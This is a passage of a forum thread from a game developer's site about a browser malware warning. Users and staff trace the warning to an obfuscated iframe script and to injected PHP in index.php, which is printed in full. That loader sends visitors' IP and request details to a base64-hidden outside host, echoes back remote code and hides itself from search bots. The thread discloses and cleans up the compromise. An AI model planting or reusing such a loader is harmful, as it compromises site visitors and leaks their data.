View unanswered posts | View active topics It is currently Wed Dec 25, 2024 6:53 pm



Reply to topic  [ 37 posts ]  Go to page Previous  1, 2, 3  Next
 DataRealms Website Malware Warning 
Author Message
A HUMAN BRAIN, SAFELY INSULATED FROM THE TERRORS OF HYPERSPACE
User avatar

Joined: Sun Jan 28, 2007 8:54 pm
Posts: 1070
Location: Somewhere beyond the endless sea of hyperspace, fighting for your right to call a planet home.
Reply with quote
Post Re: DataRealms Website Malware Warning
Well, this isn't any good is it.


Mon Jun 11, 2012 4:01 pm
Profile
DRL Developer
DRL Developer
User avatar

Joined: Wed Dec 13, 2006 5:27 am
Posts: 3138
Location: A little south and a lot west of Moscow
Reply with quote
Post Re: DataRealms Website Malware Warning
As you guys can probably imagine, Data is trying to get these problems (as well as some potentially related server issues) dealt with as soon as possible. It's getting a little difficult, though, since he's also trying to work on the next version of CC at the same time. If anybody is willing to give him a hand, or knows anybody who might, send me (or him) a PM.


Wed Jun 13, 2012 2:28 am
Profile WWW
User avatar

Joined: Fri Aug 26, 2011 3:06 am
Posts: 42
Reply with quote
Post Re: DataRealms Website Malware Warning
Wish I could help, all I can do is point out problems though.

The warning is gone right now, that said.


Wed Jun 13, 2012 2:48 am
Profile
User avatar

Joined: Fri Aug 26, 2011 3:06 am
Posts: 42
Reply with quote
Post Re: DataRealms Website Malware Warning
Uh oh. The warning is back again.


Thu Jun 21, 2012 10:37 am
Profile
User avatar

Joined: Tue Dec 12, 2006 3:10 pm
Posts: 495
Location: Uncertain quantum state
Reply with quote
Post Re: DataRealms Website Malware Warning
http://pastebin.com/Y9rTWnzJ

Oh hi there. This is the presumably foreign piece of script on the site that I managed to catch.
It was in a hidden iframe, with a src of "http://ovalslassostyle.net/111"
scriptsrc being "/xSE_dFpCn/xjUVworW?cvgqzt=OL.k_kgz8zX5kO"

Funny obfuscation.
It creates strings "eval", "substring", "fromCharCode", "indexOf" and "CharAt" with the variables, and calls them as functions.

I think the starting ifs break the script after it executes, removing it.

http://pastebin.com/QuWRS4Hd Here's my best-guess unobfuscation and cleanup.

The script then takes a substring and eval's the decrypted code. http://pastebin.com/MLY8i1kG
Ie. exactly what Daman said.


Sun Jun 24, 2012 1:21 pm
Profile
User avatar

Joined: Fri Aug 26, 2011 3:06 am
Posts: 42
Reply with quote
Post Re: DataRealms Website Malware Warning
Once again, the warning is gone, for now. Hopefully, for good.


Sun Jun 24, 2012 6:01 pm
Profile
The Licensing Guy
The Licensing Guy
User avatar

Joined: Sun Aug 24, 2008 2:00 am
Posts: 64
Location: Buenos Aires, Argentina.
Reply with quote
Post Re: DataRealms Website Malware Warning
If you ever see something like this again, please give me the URL on the datarealms site where the warning appears, and (if possible) the offending code.

Site seems clean now.


Sun Jun 24, 2012 8:38 pm
Profile WWW
User avatar

Joined: Tue Dec 12, 2006 3:10 pm
Posts: 495
Location: Uncertain quantum state
Reply with quote
Post Re: DataRealms Website Malware Warning
As already said, it seems to be happening once per ip or something. The offsite code (called by the obfuscated script) likely hides the script from you once it executes.
Or maybe it uses cookies.
I caught it with NoScript: it pops a nice big block icon where the invisible iframe resides.

Will check the GET console of Firefox the next time it happens, in hopes of getting a look at the offsite code. I doubt that's how it works, but eh.


Sun Jun 24, 2012 8:45 pm
Profile
The Licensing Guy
The Licensing Guy
User avatar

Joined: Sun Aug 24, 2008 2:00 am
Posts: 64
Location: Buenos Aires, Argentina.
Reply with quote
Post Re: DataRealms Website Malware Warning
Thanks for the info, findude.
Seems we had this stuck in index.php

Code:
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

So it was getting the evil code from an external site. Time to audit security it seems!


Sun Jun 24, 2012 10:11 pm
Profile WWW
User avatar

Joined: Sat Jul 10, 2010 5:19 pm
Posts: 543
Reply with quote
Post Re: DataRealms Website Malware Warning
So, does this mean DRL users are now part of a botnet, or did I read the last two pages incorrectly?


Sun Jun 24, 2012 11:58 pm
Profile
DRL Developer
DRL Developer
User avatar

Joined: Wed Dec 13, 2006 5:27 am
Posts: 3138
Location: A little south and a lot west of Moscow
Reply with quote
Post Re: DataRealms Website Malware Warning
I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay.


Mon Jun 25, 2012 5:17 am
Profile WWW
User avatar

Joined: Fri Aug 26, 2011 3:06 am
Posts: 42
Reply with quote
Post Re: DataRealms Website Malware Warning
I always get this warning at the main site http://www.datarealms.com/ and I generally don't proceed after that.

But I'll send the PM if it happens again.


Mon Jun 25, 2012 6:15 pm
Profile
The Licensing Guy
The Licensing Guy
User avatar

Joined: Sun Aug 24, 2008 2:00 am
Posts: 64
Location: Buenos Aires, Argentina.
Reply with quote
Post Re: DataRealms Website Malware Warning
TheLastBanana wrote:
I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay.


The last little while being from May 20 onwards.


Tue Jun 26, 2012 7:07 pm
Profile WWW
User avatar

Joined: Fri Aug 26, 2011 3:06 am
Posts: 42
Reply with quote
Post Re: DataRealms Website Malware Warning
I ran an avast scan on June 10 and a MWB scan on June 25. The former resulted in some supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, one being Explorer\Advanced|Start_ShowHelp and Explorer\Advanced|Start_ShowSearch.

I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site.


Tue Jun 26, 2012 8:17 pm
Profile
The Licensing Guy
The Licensing Guy
User avatar

Joined: Sun Aug 24, 2008 2:00 am
Posts: 64
Location: Buenos Aires, Argentina.
Reply with quote
Post Re: DataRealms Website Malware Warning
NikolaiLev wrote:
I ran an avast scan on June 10 and a MWB scan on June 25. The former resulted in some supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, one being Explorer\Advanced|Start_ShowHelp and Explorer\Advanced|Start_ShowSearch.

I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site.


PUM = Potentially Unwanted Modifications -- Start_ShowHelp hides Start Menu/Help and Start_ShowSearch hides Start Menu/Search. Pretty simple (and benign) stuff.


Tue Jun 26, 2012 10:35 pm
Profile WWW
Display posts from previous:  Sort by  
Reply to topic   [ 37 posts ]  Go to page Previous  1, 2, 3  Next

Who is online

Users browsing this forum: No registered users


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group.
Designed by STSoftware for PTF.
[ Time : 0.064s | 14 Queries | GZIP : Off ]